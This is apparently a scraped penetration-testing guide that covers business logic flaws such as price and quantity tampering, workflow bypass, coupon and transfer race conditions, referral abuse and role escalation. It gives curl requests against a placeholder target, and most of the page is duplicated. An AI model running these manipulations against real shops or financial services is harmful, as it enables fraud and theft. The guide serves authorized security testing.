Testing for Business Logic Vulnerabilities

When to Use

During authorized penetration tests when automated scanners have found few technical vulnerabilities
When assessing e-commerce platforms for pricing, cart, and payment flow manipulations
For testing multi-step workflows (registration, checkout, approval processes) for bypass opportunities
When evaluating rate-limited features like vouchers, coupons, referrals, and rewards systems
During security assessments of financial applications, voting systems, or any application with critical business rules

Prerequisites

Authorization: Written penetration testing agreement covering business logic testing
Burp Suite Professional: For intercepting and modifying multi-step request flows
Application understanding: Thorough knowledge of the application's intended business workflows
Multiple test accounts: Accounts at different privilege levels and states
Browser DevTools: For examining client-side validation logic
Documentation: Business requirements or user stories describing expected behavior

Workflow

Step 1: Map Business Workflows and Rules

Document all critical business processes and their expected constraints.

# Critical business flows to map:
# 1. Registration/Onboarding flow
#    - Email verification requirements
#    - Account approval process
#    - Role assignment logic

# 2. E-commerce/Purchase flow
#    - Product selection → Cart → Checkout → Payment → Confirmation
#    - Price calculation logic
#    - Discount/coupon application
#    - Quantity limits
#    - Shipping cost calculation

# 3. Authentication/Authorization flow
#    - Login → MFA → Dashboard
#    - Password reset → Token → New password
#    - Role escalation/approval

# 4. Financial transactions
#    - Balance check → Transfer → Confirmation
#    - Withdrawal limits
#    - Currency conversion

# Document expected constraints:
# - Minimum order amounts
# - Maximum quantity per item
# - Coupon usage limits (one per user)
# - Referral reward caps
# - Withdrawal daily limits
# - Account verification requirements before certain actions

Step 2: Test Price and Quantity Manipulation

Intercept and modify price, quantity, and total values in requests.

# Test negative quantity
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": -1, "price": 99.99}' \
  "https://target.example.com/api/cart/add"

# Test zero price
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 1, "price": 0}' \
  "https://target.example.com/api/cart/add"

# Test extremely large quantity
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 999999999}' \
  "https://target.example.com/api/cart/add"

# Test decimal/float manipulation
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 0.001, "price": 0.01}' \
  "https://target.example.com/api/cart/add"

# Test integer overflow
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 2147483647}' \
  "https://target.example.com/api/cart/add"

# Modify total amount directly in checkout request
# Intercept in Burp and change total from 299.99 to 0.01
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id": "abc123", "total": 0.01, "payment_method": "card"}' \
  "https://target.example.com/api/checkout"

Step 3: Test Workflow Step Bypass

Attempt to skip required steps in multi-step processes.

# Skip email verification
# Instead of: Register → Verify email → Access dashboard
# Try: Register → Access dashboard directly
curl -s -H "Authorization: Bearer $UNVERIFIED_TOKEN" \
  "https://target.example.com/api/dashboard"

# Skip payment step
# Instead of: Cart → Shipping → Payment → Confirmation
# Try: Cart → Confirmation (skip payment)
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id": "abc123", "shipping_address": "123 Main St"}' \
  "https://target.example.com/api/orders/confirm"

# Skip MFA step
# Instead of: Login → MFA → Dashboard
# Try: Login → Dashboard (skip MFA)
# After successful password auth, directly access protected resources

# Skip approval process
# Instead of: Submit request → Manager approval → Access granted
# Try: Submit request → Access granted (skip approval)

# Repeat a step that should be one-time
# Apply same coupon code multiple times
for i in $(seq 1 5); do
  curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"coupon_code": "DISCOUNT50"}' \
    "https://target.example.com/api/cart/apply-coupon"
  echo "Attempt $i"
done

Step 4: Test Race Conditions in Business Logic

Exploit timing windows in concurrent request processing.

# Race condition on coupon application
# Send multiple identical requests simultaneously
for i in $(seq 1 10); do
  curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"coupon_code": "ONETIME50"}' \
    "https://target.example.com/api/cart/apply-coupon" &
done
wait

# Race condition on balance transfer
# If user has $100, try to transfer $100 to two accounts simultaneously
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"to": "user_b", "amount": 100}' \
  "https://target.example.com/api/transfer" &

curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"to": "user_c", "amount": 100}' \
  "https://target.example.com/api/transfer" &
wait

# Race condition on reward claiming
# Using Burp Turbo Intruder for precise timing:
# 1. Send request to Turbo Intruder
# 2. Use race condition script template
# 3. Send 20+ requests simultaneously
# 4. Check if reward was claimed multiple times

Step 5: Test Referral and Reward System Abuse

Find ways to exploit promotional features and reward mechanisms.

# Self-referral: refer your own email
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"referral_email": "myown@email.com"}' \
  "https://target.example.com/api/referrals/invite"

# Referral code reuse across multiple accounts
# Create multiple accounts and use same referral code

# Coupon stacking: apply multiple discount codes
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"coupon_codes": ["SAVE10", "WELCOME20", "VIP50"]}' \
  "https://target.example.com/api/cart/apply-coupons"

# Abuse free trial: re-register with same details
# Test if email+1@domain.com or email@domain.com bypass duplicate detection

# Gift card / credit manipulation
# Buy gift card with gift card balance (circular)
# Apply gift card with value > purchase price (get change as credit)

# Test reward point manipulation
# Earn points on order → Cancel order → Keep points
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  "https://target.example.com/api/orders/12345/cancel"
# Check if reward points from order 12345 were revoked

Step 6: Test Role and Permission Logic

Assess authorization logic for privilege escalation through business processes.

# Role escalation via registration parameter
curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email":"test@test.com","password":"Test1234!","role":"admin"}' \
  "https://target.example.com/api/auth/register"

# Organization tenant boundary testing
# User in Org A tries to access Org B resources via business workflows
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN_ORG_A" \
  -H "Content-Type: application/json" \
  -d '{"org_id": "org_b_id", "action": "view_reports"}' \
  "https://target.example.com/api/reports"

# Test for privilege retention after role downgrade
# Admin → Regular user: can they still access admin functions?
# Employee → Terminated: can they still access company resources?

# Test invitation/delegation abuse
# Invite user with higher privileges than inviter has
curl -s -X POST \
  -H "Authorization: Bearer $REGULAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email":"new@test.com","role":"admin"}' \
  "https://target.example.com/api/users/invite"

Key Concepts

Concept	Description
Business Logic Flaw	A vulnerability in the application's workflow or rules that allows unintended actions
Price Manipulation	Modifying price, quantity, or total values in client-side requests
Workflow Bypass	Skipping required steps in a multi-step business process
Race Condition	Exploiting concurrent request processing to violate business constraints
Privilege Escalation	Gaining higher permissions through business process manipulation
Negative Testing	Testing with unexpected values (negative, zero, null, extreme)
State Manipulation	Changing application state in an order not intended by the business logic

Tools & Systems

Tool	Purpose
Burp Suite Professional	Request interception, modification, and sequence testing
Burp Turbo Intruder	High-speed request sending for race condition testing
Burp Sequencer	Token randomness analysis for predictable reference testing
OWASP ZAP	Open-source alternative for proxy-based testing
Postman	Workflow testing with collection runners and environment variables
Custom scripts	Python/bash scripts for automated business logic testing

Common Scenarios

Scenario 1: Coupon Code Stacking

An e-commerce site allows applying multiple coupon codes. By stacking "WELCOME10", "SAVE20", and "VIP30", the total discount exceeds the product price, resulting in a negative balance or free order.

Scenario 2: Race Condition on Fund Transfer

A banking application checks balance before transfer but does not lock the account. Sending two simultaneous $1000 transfers from a $1000 balance results in both succeeding, creating money from nothing.

Scenario 3: Checkout Price Override

The checkout flow sends the total amount in the POST body. Intercepting and changing the total from $499.99 to $0.01 results in a successful order at the manipulated price.

Scenario 4: Password Reset Token Reuse

The password reset flow generates a one-time token but does not invalidate it after use. The same token can be used repeatedly to reset the password.

Output Format

## Business Logic Vulnerability Finding

**Vulnerability**: Price Manipulation in Checkout Flow
**Severity**: Critical (CVSS 9.1)
**Location**: POST /api/checkout - `total` parameter
**OWASP Category**: A04:2021 - Insecure Design

### Reproduction Steps
1. Add item to cart (price: $499.99)
2. Proceed to checkout
3. Intercept POST /api/checkout request in Burp
4. Modify "total" from 499.99 to 0.01
5. Forward the request; order completes at $0.01

### Business Rules Violated
| Rule | Expected | Actual |
|------|----------|--------|
| Server-side price calculation | Total computed server-side | Client-submitted total accepted |
| Coupon single use | One coupon per order | Same coupon applied 5 times |
| Negative quantity check | Quantity >= 1 | Quantity -1 accepted (credit issued) |
| Race condition on transfer | Balance checked atomically | Dual transfer exceeded balance |

### Impact
- Financial loss: orders processed at attacker-controlled prices
- Inventory loss: products shipped for $0.01
- Reward abuse: unlimited referral credits via self-referral
- Double-spending via race condition on transfers

### Recommendation
1. Perform all price calculations server-side; never trust client-submitted totals
2. Implement server-side validation for quantity (positive integers only)
3. Use database-level locks or atomic transactions for financial operations
4. Implement idempotency keys to prevent duplicate transaction processing
5. Rate-limit and log coupon applications, referral submissions, and transfers

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC6.1 (Logical Access), CC8.1 (Change Management)
ISO 27001: A.14.2 (Secure Development), A.14.1 (Security Requirements)
NIST 800-53: SA-11 (Developer Testing), SI-10 (Input Validation), SC-18 (Mobile Code)
OWASP LLM Top 10: LLM01 (Prompt Injection), LLM02 (Insecure Output)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add testing-for-business-logic-vulnerabilities

# Or load dynamically via MCP
grc.load_skill("testing-for-business-logic-vulnerabilities")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Testing for Business Logic Vulnerabilities

When to Use

During authorized penetration tests when automated scanners have found few technical vulnerabilities
When assessing e-commerce platforms for pricing, cart, and payment flow manipulations
For testing multi-step workflows (registration, checkout, approval processes) for bypass opportunities
When evaluating rate-limited features like vouchers, coupons, referrals, and rewards systems
During security assessments of financial applications, voting systems, or any application with critical business rules

Prerequisites

Authorization: Written penetration testing agreement covering business logic testing
Burp Suite Professional: For intercepting and modifying multi-step request flows
Application understanding: Thorough knowledge of the application's intended business workflows
Multiple test accounts: Accounts at different privilege levels and states
Browser DevTools: For examining client-side validation logic
Documentation: Business requirements or user stories describing expected behavior

Workflow

Step 1: Map Business Workflows and Rules

Document all critical business processes and their expected constraints.

# Critical business flows to map:
# 1. Registration/Onboarding flow
#    - Email verification requirements
#    - Account approval process
#    - Role assignment logic

# 2. E-commerce/Purchase flow
#    - Product selection → Cart → Checkout → Payment → Confirmation
#    - Price calculation logic
#    - Discount/coupon application
#    - Quantity limits
#    - Shipping cost calculation

# 3. Authentication/Authorization flow
#    - Login → MFA → Dashboard
#    - Password reset → Token → New password
#    - Role escalation/approval

# 4. Financial transactions
#    - Balance check → Transfer → Confirmation
#    - Withdrawal limits
#    - Currency conversion

# Document expected constraints:
# - Minimum order amounts
# - Maximum quantity per item
# - Coupon usage limits (one per user)
# - Referral reward caps
# - Withdrawal daily limits
# - Account verification requirements before certain actions

Step 2: Test Price and Quantity Manipulation

Intercept and modify price, quantity, and total values in requests.

# Test negative quantity
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": -1, "price": 99.99}' \
  "https://target.example.com/api/cart/add"

# Test zero price
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 1, "price": 0}' \
  "https://target.example.com/api/cart/add"

# Test extremely large quantity
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 999999999}' \
  "https://target.example.com/api/cart/add"

# Test decimal/float manipulation
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 0.001, "price": 0.01}' \
  "https://target.example.com/api/cart/add"

# Test integer overflow
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 2147483647}' \
  "https://target.example.com/api/cart/add"

# Modify total amount directly in checkout request
# Intercept in Burp and change total from 299.99 to 0.01
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id": "abc123", "total": 0.01, "payment_method": "card"}' \
  "https://target.example.com/api/checkout"

Step 3: Test Workflow Step Bypass

Attempt to skip required steps in multi-step processes.

# Skip email verification
# Instead of: Register → Verify email → Access dashboard
# Try: Register → Access dashboard directly
curl -s -H "Authorization: Bearer $UNVERIFIED_TOKEN" \
  "https://target.example.com/api/dashboard"

# Skip payment step
# Instead of: Cart → Shipping → Payment → Confirmation
# Try: Cart → Confirmation (skip payment)
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id": "abc123", "shipping_address": "123 Main St"}' \
  "https://target.example.com/api/orders/confirm"

# Skip MFA step
# Instead of: Login → MFA → Dashboard
# Try: Login → Dashboard (skip MFA)
# After successful password auth, directly access protected resources

# Skip approval process
# Instead of: Submit request → Manager approval → Access granted
# Try: Submit request → Access granted (skip approval)

# Repeat a step that should be one-time
# Apply same coupon code multiple times
for i in $(seq 1 5); do
  curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"coupon_code": "DISCOUNT50"}' \
    "https://target.example.com/api/cart/apply-coupon"
  echo "Attempt $i"
done

Step 4: Test Race Conditions in Business Logic

Exploit timing windows in concurrent request processing.

# Race condition on coupon application
# Send multiple identical requests simultaneously
for i in $(seq 1 10); do
  curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"coupon_code": "ONETIME50"}' \
    "https://target.example.com/api/cart/apply-coupon" &
done
wait

# Race condition on balance transfer
# If user has $100, try to transfer $100 to two accounts simultaneously
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"to": "user_b", "amount": 100}' \
  "https://target.example.com/api/transfer" &

curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"to": "user_c", "amount": 100}' \
  "https://target.example.com/api/transfer" &
wait

# Race condition on reward claiming
# Using Burp Turbo Intruder for precise timing:
# 1. Send request to Turbo Intruder
# 2. Use race condition script template
# 3. Send 20+ requests simultaneously
# 4. Check if reward was claimed multiple times

Step 5: Test Referral and Reward System Abuse

Find ways to exploit promotional features and reward mechanisms.

# Self-referral: refer your own email
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"referral_email": "myown@email.com"}' \
  "https://target.example.com/api/referrals/invite"

# Referral code reuse across multiple accounts
# Create multiple accounts and use same referral code

# Coupon stacking: apply multiple discount codes
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"coupon_codes": ["SAVE10", "WELCOME20", "VIP50"]}' \
  "https://target.example.com/api/cart/apply-coupons"

# Abuse free trial: re-register with same details
# Test if email+1@domain.com or email@domain.com bypass duplicate detection

# Gift card / credit manipulation
# Buy gift card with gift card balance (circular)
# Apply gift card with value > purchase price (get change as credit)

# Test reward point manipulation
# Earn points on order → Cancel order → Keep points
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  "https://target.example.com/api/orders/12345/cancel"
# Check if reward points from order 12345 were revoked

Step 6: Test Role and Permission Logic

Assess authorization logic for privilege escalation through business processes.

# Role escalation via registration parameter
curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email":"test@test.com","password":"Test1234!","role":"admin"}' \
  "https://target.example.com/api/auth/register"

# Organization tenant boundary testing
# User in Org A tries to access Org B resources via business workflows
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN_ORG_A" \
  -H "Content-Type: application/json" \
  -d '{"org_id": "org_b_id", "action": "view_reports"}' \
  "https://target.example.com/api/reports"

# Test for privilege retention after role downgrade
# Admin → Regular user: can they still access admin functions?
# Employee → Terminated: can they still access company resources?

# Test invitation/delegation abuse
# Invite user with higher privileges than inviter has
curl -s -X POST \
  -H "Authorization: Bearer $REGULAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email":"new@test.com","role":"admin"}' \
  "https://target.example.com/api/users/invite"

Key Concepts

Concept	Description
Business Logic Flaw	A vulnerability in the application's workflow or rules that allows unintended actions
Price Manipulation	Modifying price, quantity, or total values in client-side requests
Workflow Bypass	Skipping required steps in a multi-step business process
Race Condition	Exploiting concurrent request processing to violate business constraints
Privilege Escalation	Gaining higher permissions through business process manipulation
Negative Testing	Testing with unexpected values (negative, zero, null, extreme)
State Manipulation	Changing application state in an order not intended by the business logic

Tools & Systems

Tool	Purpose
Burp Suite Professional	Request interception, modification, and sequence testing
Burp Turbo Intruder	High-speed request sending for race condition testing
Burp Sequencer	Token randomness analysis for predictable reference testing
OWASP ZAP	Open-source alternative for proxy-based testing
Postman	Workflow testing with collection runners and environment variables
Custom scripts	Python/bash scripts for automated business logic testing

Common Scenarios

Scenario 1: Coupon Code Stacking

An e-commerce site allows applying multiple coupon codes. By stacking "WELCOME10", "SAVE20", and "VIP30", the total discount exceeds the product price, resulting in a negative balance or free order.

Scenario 2: Race Condition on Fund Transfer

Scenario 3: Checkout Price Override

The checkout flow sends the total amount in the POST body. Intercepting and changing the total from $499.99 to $0.01 results in a successful order at the manipulated price.

Scenario 4: Password Reset Token Reuse

The password reset flow generates a one-time token but does not invalidate it after use. The same token can be used repeatedly to reset the password.

Output Format

## Business Logic Vulnerability Finding

**Vulnerability**: Price Manipulation in Checkout Flow
**Severity**: Critical (CVSS 9.1)
**Location**: POST /api/checkout - `total` parameter
**OWASP Category**: A04:2021 - Insecure Design

### Reproduction Steps
1. Add item to cart (price: $499.99)
2. Proceed to checkout
3. Intercept POST /api/checkout request in Burp
4. Modify "total" from 499.99 to 0.01
5. Forward the request; order completes at $0.01

### Business Rules Violated
| Rule | Expected | Actual |
|------|----------|--------|
| Server-side price calculation | Total computed server-side | Client-submitted total accepted |
| Coupon single use | One coupon per order | Same coupon applied 5 times |
| Negative quantity check | Quantity >= 1 | Quantity -1 accepted (credit issued) |
| Race condition on transfer | Balance checked atomically | Dual transfer exceeded balance |

### Impact
- Financial loss: orders processed at attacker-controlled prices
- Inventory loss: products shipped for $0.01
- Reward abuse: unlimited referral credits via self-referral
- Double-spending via race condition on transfers

### Recommendation
1. Perform all price calculations server-side; never trust client-submitted totals
2. Implement server-side validation for quantity (positive integers only)
3. Use database-level locks or atomic transactions for financial operations
4. Implement idempotency keys to prevent duplicate transaction processing
5. Rate-limit and log coupon applications, referral submissions, and transfers

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC6.1 (Logical Access), CC8.1 (Change Management)
ISO 27001: A.14.2 (Secure Development), A.14.1 (Security Requirements)
NIST 800-53: SA-11 (Developer Testing), SI-10 (Input Validation), SC-18 (Mobile Code)
OWASP LLM Top 10: LLM01 (Prompt Injection), LLM02 (Insecure Output)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add testing-for-business-logic-vulnerabilities

# Or load dynamically via MCP
grc.load_skill("testing-for-business-logic-vulnerabilities")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Prerequisites

Testing for Business Logic Vulnerabilities

When to Use

Prerequisites

Workflow

Step 1: Map Business Workflows and Rules

Step 2: Test Price and Quantity Manipulation

Step 3: Test Workflow Step Bypass

Step 4: Test Race Conditions in Business Logic

Step 5: Test Referral and Reward System Abuse

Step 6: Test Role and Permission Logic

Key Concepts

Tools & Systems

Common Scenarios

Scenario 1: Coupon Code Stacking

Scenario 2: Race Condition on Fund Transfer

Scenario 3: Checkout Price Override

Scenario 4: Password Reset Token Reuse

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Testing for XSS Vulnerabilities with Burpsuite

Exploiting HTTP Request Smuggling

Exploiting IDOR Vulnerabilities

Exploiting Server Side Request Forgery

Exploiting Websocket Vulnerabilities

Performing CSRF Attack Simulation

Prerequisites

Testing for Business Logic Vulnerabilities

When to Use

Prerequisites

Workflow

Step 1: Map Business Workflows and Rules

Step 2: Test Price and Quantity Manipulation

Step 3: Test Workflow Step Bypass

Step 4: Test Race Conditions in Business Logic

Step 5: Test Referral and Reward System Abuse

Step 6: Test Role and Permission Logic

Key Concepts

Tools & Systems

Common Scenarios

Scenario 1: Coupon Code Stacking

Scenario 2: Race Condition on Fund Transfer

Scenario 3: Checkout Price Override

Scenario 4: Password Reset Token Reuse

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Testing for XSS Vulnerabilities with Burpsuite

Exploiting HTTP Request Smuggling

Exploiting IDOR Vulnerabilities

Exploiting Server Side Request Forgery

Exploiting Websocket Vulnerabilities

Performing CSRF Attack Simulation